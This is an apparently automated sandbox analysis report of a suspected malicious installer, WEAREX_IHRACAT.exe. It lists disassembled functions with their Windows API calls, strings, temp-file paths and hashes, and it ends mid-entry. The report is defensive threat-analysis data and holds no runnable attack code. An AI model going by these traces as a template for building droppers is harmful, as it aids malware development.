                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                          • DeleteObject.GDI32(00000000), ref: 00404C04
                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                          • ShowWindow.USER32(?,00000005), ref: 00404D5E
                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                          • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                          • GlobalFree.KERNEL32(?), ref: 00404F3E
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                          • ShowWindow.USER32(?,00000000), ref: 004050DD
                          • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                          • ShowWindow.USER32(00000000), ref: 004050EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                          • String ID: $M$N
                          • API String ID: 1638840714-813528018
                          • Opcode ID: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                          • Instruction ID: 29e4c212ffdeb16812bd97cb13f1a8c590c5d02c92ec483b1b79380362aa6ea4
                          • Opcode Fuzzy Hash: bf664345da88dc12edd80d48b6c2875d0c41ff9ad1cb101931b2586e856e927d
                          • Instruction Fuzzy Hash: 88026FB0A00209EFEB209F54DD85AAE7BB5FB84314F10817AF610B62E1C7799D52CF58
                          APIs
                          • GetDlgItem.USER32(?,000003FB), ref: 00404617
                          • SetWindowTextW.USER32(00000000,?), ref: 00404641
                          • SHBrowseForFolderW.SHELL32(?), ref: 004046F2
                          • CoTaskMemFree.OLE32(00000000), ref: 004046FD
                          • lstrcmpiW.KERNEL32(Call,004226D0,00000000,?,?), ref: 0040472F
                          • lstrcatW.KERNEL32(?,Call), ref: 0040473B
                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 0040474D
                            • Part of subcall function 004056A8: GetDlgItemTextW.USER32(?,?,00000400,00404784), ref: 004056BB
                            • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                            • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                            • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                            • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          • GetDiskFreeSpaceW.KERNEL32(004206A0,?,?,0000040F,?,004206A0,004206A0,?,00000000,004206A0,?,?,000003FB,?), ref: 0040480E
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404829
                          • SetDlgItemTextW.USER32(00000000,00000400,00420690), ref: 004048AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\gangningerne\jot\mtn$Call
                          • API String ID: 2246997448-3840848091
                          • Opcode ID: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                          • Instruction ID: c4517917acc678d55e137743079e569baa2315114eae4e5bd7326678801c6655
                          • Opcode Fuzzy Hash: 6fddff4e1689756d95d27fbad362c9768c9b964156ab75830da741ab968877ef
                          • Instruction Fuzzy Hash: B69171B1900219EBDB11AFA1CC85AAF77B8EF85314F10843BF611B72D1D77C9A418B69
                          APIs
                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                          Strings
                          • C:\Users\user\gangningerne\jot\mtn\Discomplexion, xrefs: 004020F5
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: CreateInstance
                          • String ID: C:\Users\user\gangningerne\jot\mtn\Discomplexion
                          • API String ID: 542301482-462110826
                          • Opcode ID: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                          • Instruction ID: c11495a377249a79f2c0f90d15cc2262a1b8c0356f549485b3d6f64f05c33611
                          • Opcode Fuzzy Hash: 0ecf81e3720b8fa1d97477eddaf9048000be678ddf3c5f5c56140a49ea83b6a4
                          • Instruction Fuzzy Hash: 51416F75A00104BFCB00DFA8C988EAE7BB6EF48314B20456AF905EB2D1CB79ED41CB55
                          APIs
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                          • ShowWindow.USER32(?), ref: 00403CAE
                          • DestroyWindow.USER32 ref: 00403CC2
                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                          • GetDlgItem.USER32(?,?), ref: 00403CFF
                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                          • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                          • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                          • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                          • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                          • ShowWindow.USER32(00000000,?), ref: 00403F04
                          • EnableWindow.USER32(?,?), ref: 00403F16
                          • EnableWindow.USER32(?,?), ref: 00403F31
                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                          • EnableMenuItem.USER32(00000000), ref: 00403F4E
                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                          • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                          • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                          • ShowWindow.USER32(?,0000000A), ref: 004040EA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                          • String ID:
                          • API String ID: 184305955-0
                          • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                          • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                          • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                          • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E
                          APIs
                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404368
                          • GetDlgItem.USER32(?,000003E8), ref: 0040437C
                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404399
                          • GetSysColor.USER32(?), ref: 004043AA
                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043B8
                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043C6
                          • lstrlenW.KERNEL32(?), ref: 004043CB
                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043D8
                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043ED
                          • GetDlgItem.USER32(?,0000040A), ref: 00404446
                          • SendMessageW.USER32(00000000), ref: 0040444D
                          • GetDlgItem.USER32(?,000003E8), ref: 00404478
                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044BB
                          • LoadCursorW.USER32(00000000,00007F02), ref: 004044C9
                          • SetCursor.USER32(00000000), ref: 004044CC
                          • ShellExecuteW.SHELL32(0000070B,open,00427180,00000000,00000000,00000001), ref: 004044E1
                          • LoadCursorW.USER32(00000000,00007F00), ref: 004044ED
                          • SetCursor.USER32(00000000), ref: 004044F0
                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040451F
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404531
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                          • String ID: AB@$Call$N$open
                          • API String ID: 3615053054-1375180041
                          • Opcode ID: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                          • Instruction ID: a1eca56f6606bae04d2d34ddc617297d88c2ed2d28d9e68ba70837b4d7182fad
                          • Opcode Fuzzy Hash: ade7f38ee6ed01377910c42966ef7019c8b9a8a80681b66c8b0a0f2d68505ed8
                          • Instruction Fuzzy Hash: 657160F1A00209BFDB109F64DD85A6A7B69FB84755F00803AF705BA2D0C778AD51CFA9
                          APIs
                          • lstrcpyW.KERNEL32(00425D70,NUL,?,00000000,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C16
                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405DAA,?,?,00000001,00405922,?,00000000,000000F1,?), ref: 00405C3A
                          • GetShortPathNameW.KERNEL32(00000000,00425D70,00000400), ref: 00405C43
                            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                            • Part of subcall function 00405AB9: lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                          • GetShortPathNameW.KERNEL32(?,00426570,00000400), ref: 00405C60
                          • wsprintfA.USER32 ref: 00405C7E
                          • GetFileSize.KERNEL32(00000000,00000000,00426570,C0000000,00000004,00426570,?,?,?,?,?), ref: 00405CB9
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405CC8
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D00
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425970,00000000,-0000000A,00409544,00000000,[Rename],00000000,00000000,00000000), ref: 00405D56
                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405D68
                          • GlobalFree.KERNEL32(00000000), ref: 00405D6F
                          • CloseHandle.KERNEL32(00000000), ref: 00405D76
                            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                          • String ID: %ls=%ls$NUL$[Rename]$p]B$peB
                          • API String ID: 1265525490-3322868524
                          • Opcode ID: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                          • Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
                          • Opcode Fuzzy Hash: 3c7f54d89e258796605fea9f6ef32f5c4e34e08a6eb3a6df642de3325c5bcbec
                          • Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D
                          APIs
                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32(?,?), ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F
                          • API String ID: 941294808-1304234792
                          • Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                          • Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
                          • Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
                          • Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061DF
                          • CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                          • CharNextW.USER32(?,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 004061F3
                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,752C3420,00403510), ref: 00406206
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-341263832
                          • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                          • Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
                          • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                          • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                          APIs
                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritelstrlen
                          • String ID: 8$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp$C:\Users\user\AppData\Local\Temp\nseB6DC.tmp\System.dll
                          • API String ID: 1453599865-487296252
                          • Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                          • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                          • Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                          • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                          • GetSysColor.USER32(00000000), ref: 004041CD
                          • SetTextColor.GDI32(?,00000000), ref: 004041D9
                          • SetBkMode.GDI32(?,?), ref: 004041E5
                          • GetSysColor.USER32(?), ref: 004041F8
                          • SetBkColor.GDI32(?,?), ref: 00404208
                          • DeleteObject.GDI32(?), ref: 00404222
                          • CreateBrushIndirect.GDI32(?), ref: 0040422C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                          • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                          • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                          • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                          APIs
                          • wsprintfW.USER32 ref: 100024E1
                          • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,1000186C,00000000), ref: 100024F5
                            • Part of subcall function 100012F3: lstrcpyW.KERNEL32(00000019,00000000,752BFFC0,100011AA,?,00000000), ref: 1000131E
                          • GlobalFree.KERNEL32(?), ref: 10002562
                          • GlobalFree.KERNEL32(00000000), ref: 1000258B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2459321793.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000000.00000002.2459293214.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459349894.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                          • Associated: 00000000.00000002.2459378881.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_10000000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: FreeGlobal$FromStringlstrcpywsprintf
                          • String ID:
                          • API String ID: 2435812281-0
                          • Opcode ID: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                          • Instruction ID: c19482fd6b93636a14d77dfdabfb39ecfcb824cf15b2f076733b0032149e6b96
                          • Opcode Fuzzy Hash: 807ecd49f57fcdd2c1ed8b1de5a90652cdea8abff6875a4201383d0a7460da97
                          • Instruction Fuzzy Hash: B13104B1405A06EFF621DFA4CC9492BBBBCFB403D6722491AF6419216DCB319C50DF64
                          APIs
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                          • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                          • GlobalFree.KERNEL32(00000000), ref: 00402875
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                          • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                          • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                          • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                          APIs
                          • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                          • lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                          • lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                          • SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                          • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                          • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                          • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8
                          APIs
                          • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                          • GetTickCount.KERNEL32 ref: 00402D51
                          • wsprintfW.USER32 ref: 00402D7F
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                            • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                            • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                            • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                            • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                            • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                          • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                          • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                            • Part of subcall function 00402CFC: MulDiv.KERNEL32(00000000,00000064,0000521D), ref: 00402D11
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                          • String ID: ... %d%%
                          • API String ID: 722711167-2449383134
                          • Opcode ID: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                          • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                          • Opcode Fuzzy Hash: 201e492ae77eb6b4c8df967ba73cc99fc00f9962e74671e1787f0dc67121c729
                          • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                          APIs
                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                          • GetMessagePos.USER32 ref: 00404A7F
                          • ScreenToClient.USER32(?,?), ref: 00404A99
                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                          • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                          • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                          • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
                          • wsprintfW.USER32 ref: 00402CCF
                          • SetWindowTextW.USER32(?,?), ref: 00402CDF
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                          • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
